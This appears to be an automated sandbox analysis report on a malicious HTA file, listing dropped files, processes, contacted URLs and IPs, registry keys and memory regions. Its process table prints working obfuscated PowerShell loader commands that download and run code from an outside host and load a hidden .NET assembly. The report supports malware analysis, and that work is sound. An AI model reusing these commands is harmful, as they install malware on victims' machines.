Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
seemybestdayguvenu.hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS
|
Unicode text, UTF-16, little-endian text, with very long lines (3147), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seemybestthingswhatdoingforbetter[1].tiff
|
Unicode text, UTF-16, little-endian text, with very long lines (3147), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESA8D6.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Sat Dec 7 16:20:57 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qybaiyi.3df.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avvm4dqb.jfk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esvajuva.csa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hivjqjli.fn2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3jathlj.hsy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mq213kx4.yq5.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 7 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\seemybestdayguvenu.hta"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs
-nOp -w 1 -c
DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
poweRshElL.Exe -ex bypaSs -nOp
-w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE
; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho
= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8D6.tmp"
"c:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://172.245.123.29/770/seemybestthingswhatdoingforbetter.tIF
|
172.245.123.29
|
||
http://172.245.123.29/770/CAMCA.txt
|
172.245.123.29
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://172.245.123.29/770/seemyb
|
unknown
|
||
https://res.cloudinary.com
|
unknown
|
||
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
|
unknown
|
||
http://172.245.123.29/770/seemybestthingswhatdoingforbetter.tIF&
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
res.cloudinary.com
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.245.123.29
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
DC0000
|
direct allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
C80000
|
heap
|
page read and write
|
||
7D90000
|
trusted library allocation
|
page read and write
|
||
6EF000
|
heap
|
page read and write
|
||
154D000
|
direct allocation
|
page execute and read and write
|
||
EDE6000
|
trusted library allocation
|
page read and write
|
||
70D0000
|
trusted library allocation
|
page read and write
|
||
5EE5000
|
heap
|
page read and write
|
||
5649000
|
trusted library allocation
|
page read and write
|
||
66FD000
|
heap
|
page read and write
|
||
3076000
|
heap
|
page read and write
|
||
2832000
|
trusted library allocation
|
page read and write
|
||
7C8B000
|
trusted library allocation
|
page read and write
|
||
1360000
|
heap
|
page read and write
|
||
5E6F000
|
heap
|
page read and write
|
||
66F7000
|
heap
|
page read and write
|
||
73BE000
|
stack
|
page read and write
|
||
51F0000
|
heap
|
page read and write
|
||
6724000
|
heap
|
page read and write
|
||
4E3C000
|
stack
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
628E000
|
heap
|
page read and write
|
||
5E29000
|
heap
|
page read and write
|
||
50C0000
|
heap
|
page read and write
|
||
14D0000
|
heap
|
page read and write
|
||
2870000
|
trusted library allocation
|
page execute and read and write
|
||
6B1000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
4D8E000
|
stack
|
page read and write
|
||
4FE8000
|
heap
|
page read and write
|
||
305E000
|
heap
|
page read and write
|
||
8380000
|
trusted library allocation
|
page read and write
|
||
7445000
|
heap
|
page execute and read and write
|
||
4610000
|
heap
|
page execute and read and write
|
||
537000
|
stack
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
3062000
|
heap
|
page read and write
|
||
6C1E000
|
stack
|
page read and write
|
||
6B2000
|
heap
|
page read and write
|
||
7CAE000
|
stack
|
page read and write
|
||
4CB7000
|
heap
|
page read and write
|
||
2F0C000
|
stack
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
74E0000
|
trusted library allocation
|
page read and write
|
||
6731000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
866D000
|
stack
|
page read and write
|
||
74CB000
|
stack
|
page read and write
|
||
5260000
|
heap
|
page read and write
|
||
23D0000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
706E000
|
stack
|
page read and write
|
||
7BBD000
|
stack
|
page read and write
|
||
6688000
|
trusted library allocation
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
6722000
|
heap
|
page read and write
|
||
7505000
|
trusted library allocation
|
page read and write
|
||
6CF2000
|
heap
|
page read and write
|
||
69E000
|
heap
|
page read and write
|
||
5F9D000
|
heap
|
page read and write
|
||
5E77000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
5FEC000
|
trusted library allocation
|
page read and write
|
||
5E31000
|
heap
|
page read and write
|
||
671B000
|
heap
|
page read and write
|
||
5D74000
|
heap
|
page read and write
|
||
4DDF000
|
stack
|
page read and write
|
||
56CE000
|
stack
|
page read and write
|
||
7F70000
|
trusted library allocation
|
page read and write
|
||
DBE000
|
stack
|
page read and write
|
||
4F70000
|
heap
|
page execute and read and write
|
||
27E0000
|
trusted library allocation
|
page read and write
|
||
7A40000
|
heap
|
page read and write
|
||
5F4E000
|
heap
|
page read and write
|
||
609B000
|
trusted library allocation
|
page read and write
|
||
7CC0000
|
trusted library allocation
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
5F96000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
7E20000
|
heap
|
page read and write
|
||
23CE000
|
stack
|
page read and write
|
||
88A0000
|
trusted library allocation
|
page execute and read and write
|
||
5206000
|
trusted library allocation
|
page read and write
|
||
6724000
|
heap
|
page read and write
|
||
8AD0000
|
heap
|
page read and write
|
||
4CED000
|
trusted library allocation
|
page execute and read and write
|
||
68EF000
|
stack
|
page read and write
|
||
66AA000
|
trusted library allocation
|
page read and write
|
||
4FFF000
|
heap
|
page read and write
|
||
4C69000
|
heap
|
page read and write
|
||
EDAD000
|
trusted library allocation
|
page read and write
|
||
6EC000
|
heap
|
page read and write
|
||
675E000
|
stack
|
page read and write
|
||
506E000
|
heap
|
page read and write
|
||
7D72000
|
heap
|
page read and write
|
||
45FE000
|
stack
|
page read and write
|
||
3041000
|
heap
|
page read and write
|
||
4CF0000
|
trusted library allocation
|
page read and write
|
||
14AE000
|
stack
|
page read and write
|
||
2F48000
|
stack
|
page read and write
|
||
57CD000
|
trusted library allocation
|
page read and write
|
||
6F30000
|
direct allocation
|
page read and write
|
||
768E000
|
stack
|
page read and write
|
||
87B0000
|
heap
|
page read and write
|
||
6EF000
|
heap
|
page read and write
|
||
543E000
|
stack
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
2850000
|
trusted library allocation
|
page read and write
|
||
73B000
|
heap
|
page read and write
|
||
5E82000
|
heap
|
page read and write
|
||
6EB000
|
heap
|
page read and write
|
||
EDC0000
|
trusted library allocation
|
page read and write
|
||
66E7000
|
heap
|
page read and write
|
||
6094000
|
trusted library allocation
|
page read and write
|
||
3342000
|
heap
|
page read and write
|
||
4D90000
|
heap
|
page read and write
|
||
6E1C000
|
heap
|
page read and write
|
||
6EAB000
|
heap
|
page read and write
|
||
83C0000
|
direct allocation
|
page read and write
|
||
5DAC000
|
heap
|
page read and write
|
||
12FC000
|
stack
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
6B1000
|
heap
|
page read and write
|
||
27CE000
|
stack
|
page read and write
|
||
50D8000
|
heap
|
page read and write
|
||
7E0A000
|
heap
|
page read and write
|
||
503A000
|
stack
|
page read and write
|
||
552E000
|
stack
|
page read and write
|
||
55CE000
|
stack
|
page read and write
|
||
4FC3000
|
heap
|
page read and write
|
||
514B000
|
stack
|
page read and write
|
||
5F50000
|
heap
|
page read and write
|
||
7CE0000
|
trusted library allocation
|
page read and write
|
||
7DE6000
|
heap
|
page read and write
|
||
5A5000
|
heap
|
page read and write
|
||
4D47000
|
heap
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
7B70000
|
trusted library allocation
|
page read and write
|
||
6E32000
|
heap
|
page read and write
|
||
6AD000
|
heap
|
page read and write
|
||
AFB000
|
stack
|
page read and write
|
||
4D7E000
|
stack
|
page read and write
|
||
330A000
|
heap
|
page read and write
|
||
652000
|
heap
|
page read and write
|
||
5182000
|
heap
|
page read and write
|
||
3061000
|
heap
|
page read and write
|
||
7FAA0000
|
trusted library allocation
|
page execute and read and write
|
||
505C000
|
heap
|
page read and write
|
||
1940000
|
heap
|
page read and write
|
||
48A0000
|
heap
|
page read and write
|
||
5FEB000
|
trusted library allocation
|
page read and write
|
||
696A000
|
stack
|
page read and write
|
||
4FCE000
|
stack
|
page read and write
|
||
6B3000
|
heap
|
page read and write
|
||
699000
|
heap
|
page read and write
|
||
5E2F000
|
heap
|
page read and write
|
||
4D80000
|
heap
|
page readonly
|
||
5F70000
|
heap
|
page read and write
|
||
5065000
|
heap
|
page read and write
|
||
A70000
|
heap
|
page read and write
|
||
842E000
|
direct allocation
|
page read and write
|
||
5E3C000
|
heap
|
page read and write
|
||
A30000
|
trusted library allocation
|
page read and write
|
||
2914000
|
heap
|
page read and write
|
||
5180000
|
heap
|
page read and write
|
||
EDC8000
|
trusted library allocation
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
C60000
|
heap
|
page read and write
|
||
4EBE000
|
stack
|
page read and write
|
||
7C87000
|
trusted library allocation
|
page read and write
|
||
671B000
|
heap
|
page read and write
|
||
7CED000
|
stack
|
page read and write
|
||
5016000
|
heap
|
page read and write
|
||
7ACA000
|
heap
|
page read and write
|
||
305A000
|
heap
|
page read and write
|
||
EE01000
|
trusted library allocation
|
page read and write
|
||
754E000
|
stack
|
page read and write
|
||
5193000
|
heap
|
page read and write
|
||
696000
|
heap
|
page read and write
|
||
7A82000
|
heap
|
page read and write
|
||
5FE5000
|
trusted library allocation
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page execute and read and write
|
||
5F9F000
|
heap
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
6A3000
|
heap
|
page read and write
|
||
305E000
|
heap
|
page read and write
|
||
DD61000
|
trusted library allocation
|
page read and write
|
||
69E000
|
heap
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
5E3E000
|
heap
|
page read and write
|
||
7C2E000
|
stack
|
page read and write
|
||
6210000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4D30000
|
trusted library allocation
|
page read and write
|
||
8390000
|
trusted library allocation
|
page read and write
|
||
842E000
|
direct allocation
|
page read and write
|
||
3042000
|
heap
|
page read and write
|
||
3056000
|
heap
|
page read and write
|
||
5E3E000
|
heap
|
page read and write
|
||
5F50000
|
heap
|
page read and write
|
||
66DB000
|
heap
|
page read and write
|
||
5E77000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
CD61000
|
trusted library allocation
|
page read and write
|
||
3062000
|
heap
|
page read and write
|
||
66D0000
|
heap
|
page execute and read and write
|
||
51A3000
|
heap
|
page read and write
|
||
4FDF000
|
heap
|
page read and write
|
||
3043000
|
heap
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page execute and read and write
|
||
5E7D000
|
heap
|
page read and write
|
||
52F0000
|
trusted library allocation
|
page read and write
|
||
6FEE000
|
stack
|
page read and write
|
||
68AE000
|
stack
|
page read and write
|
||
6520000
|
trusted library allocation
|
page read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
5E3E000
|
heap
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
3059000
|
heap
|
page read and write
|
||
505C000
|
heap
|
page read and write
|
||
2880000
|
heap
|
page read and write
|
||
307D000
|
heap
|
page read and write
|
||
263E000
|
stack
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
27F0000
|
trusted library allocation
|
page read and write
|
||
7C1D000
|
stack
|
page read and write
|
||
6F0C000
|
stack
|
page read and write
|
||
4DF1000
|
trusted library allocation
|
page read and write
|
||
5D72000
|
heap
|
page read and write
|
||
673D000
|
heap
|
page read and write
|
||
48D0000
|
heap
|
page read and write
|
||
50E8000
|
heap
|
page read and write
|
||
4E8F000
|
stack
|
page read and write
|
||
FFD000
|
stack
|
page read and write
|
||
17A0000
|
heap
|
page read and write
|
||
70B0000
|
trusted library allocation
|
page read and write
|
||
80E0000
|
trusted library allocation
|
page read and write
|
||
27F4000
|
trusted library allocation
|
page read and write
|
||
AC91000
|
trusted library allocation
|
page read and write
|
||
6EEF000
|
trusted library allocation
|
page read and write
|
||
88EE000
|
stack
|
page read and write
|
||
3366000
|
heap
|
page read and write
|
||
73B000
|
heap
|
page read and write
|
||
517C000
|
heap
|
page read and write
|
||
7DB9000
|
heap
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
7B80000
|
heap
|
page read and write
|
||
7B22000
|
heap
|
page read and write
|
||
51E0000
|
heap
|
page read and write
|
||
5F45000
|
heap
|
page read and write
|
||
568A000
|
trusted library allocation
|
page read and write
|
||
5160000
|
heap
|
page read and write
|
||
51CB000
|
heap
|
page read and write
|
||
7BE000
|
stack
|
page read and write
|
||
6722000
|
heap
|
page read and write
|
||
5016000
|
heap
|
page read and write
|
||
4CF9000
|
trusted library allocation
|
page read and write
|
||
7D30000
|
trusted library allocation
|
page read and write
|
||
8D11000
|
trusted library allocation
|
page read and write
|
||
3062000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
5E6C000
|
heap
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
7B4A000
|
trusted library allocation
|
page read and write
|
||
4FC0000
|
heap
|
page read and write
|
||
6731000
|
heap
|
page read and write
|
||
5106000
|
heap
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
50D0000
|
heap
|
page read and write
|
||
AAF000
|
heap
|
page read and write
|
||
2809000
|
trusted library allocation
|
page read and write
|
||
6744000
|
heap
|
page read and write
|
||
6580000
|
trusted library allocation
|
page read and write
|
||
5FF5000
|
trusted library allocation
|
page read and write
|
||
682000
|
heap
|
page read and write
|
||
66E6000
|
heap
|
page read and write
|
||
2890000
|
heap
|
page read and write
|
||
8ADB000
|
heap
|
page read and write
|
||
3055000
|
heap
|
page read and write
|
||
628F000
|
heap
|
page read and write
|
||
501B000
|
heap
|
page read and write
|
||
674A000
|
heap
|
page read and write
|
||
66FE000
|
heap
|
page read and write
|
||
787E000
|
stack
|
page read and write
|
||
5D3D000
|
heap
|
page read and write
|
||
7F60000
|
trusted library allocation
|
page read and write
|
||
5E27000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
2380000
|
heap
|
page read and write
|
||
3337000
|
heap
|
page read and write
|
||
672E000
|
heap
|
page read and write
|
||
351F000
|
stack
|
page read and write
|
||
4FD8000
|
heap
|
page read and write
|
||
66C0000
|
heap
|
page read and write
|
||
13A9000
|
direct allocation
|
page execute and read and write
|
||
1280000
|
